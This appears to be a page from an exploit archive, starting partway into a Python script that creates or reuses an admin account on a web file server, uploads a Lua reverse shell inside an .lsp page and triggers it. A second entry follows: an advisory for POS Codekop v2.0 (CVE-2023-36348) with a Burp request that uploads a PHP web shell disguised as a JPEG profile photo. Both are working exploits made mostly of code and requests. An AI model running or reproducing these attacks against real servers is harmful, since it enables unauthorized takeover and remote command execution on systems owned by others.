        login(r, s)
    else:
        # f-string prefix was missing here, so the colours and creds never rendered
        print(f"{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
        createUser(r, s)
        login(r, s)


def createUser(r, s):
    # the form field is named "email"; the original used the variable as the key
    data = {
        'email': email,
        'user': username,
        'password': password,
        'recoverpassword': 'on'
    }
    r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data=data)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")


def login(r, s):
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")
    data = {'ba_username': username, 'ba_password': password}
    # switching to https cause its easier to script lolz
    r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data=data, verify=False)

    # Verify login
    login_Success_Title = 'Web-File-Server'
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('title')
    for i in (search or []):
        if i != login_Success_Title:
            print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
            exit(0)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")
    exploit(r, s)


def exploit(r, s):
    # Find the file server, default is fs
    r = s.get(f"https://{url}:443/fs/cmsdocs/")
    code = r.status_code
    if code == 404:
        print(f"{Fore.RED}[!]{Fore.WHITE} File server not found.")
        exit(0)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")

    # Change the shell if you want to, when tested I've had the best luck with lua rev shell code
    # so thats what I put as default
    shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

    file_content = f'''
<h2> Check ur nc listener on the port you put in <h2>
<?lsp if request:method() == "GET" then ?>
<?lsp {shell} ?>
<?lsp else ?>
Wrong request method, goodBye!
<?lsp end ?>
'''

    files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
    r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
    if r.text == 'ok':
        print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
        r = s.get(f"https://{url}:443/rev.lsp")


if __name__ == '__main__':
    try:
        main()
    except:
        print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
-
POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
# Date: 25-05-2023
# Exploit Author: yuyudhn
# Vendor Homepage: https://www.codekop.com/
# Software Link: https://github.com/fauzan1892/pos-kasir-php
# Version: 2.0
# Tested on: Linux
# CVE: CVE-2023-36348

# Vulnerability description:
The application does not sanitize the filename parameter when sending data to /fungsi/edit/edit.php?gambar=user. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.

# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/

# Proof of Concept:
1. Login to POS Codekop dashboard.
2. Go to profile settings.
3. Upload PHP script through Upload Profile Photo.

Burp Log Example:
```
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
Host: localhost
Content-Length: 8934
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/research/pos-kasir-php/index.php?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
Connection: close

------WebKitFormBoundarymVBHqH4m6KgKBnpa
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
Content-Type: image/jpeg

ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?> ÿÛC
-----------------------------
```

PHP Web Shell location: http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php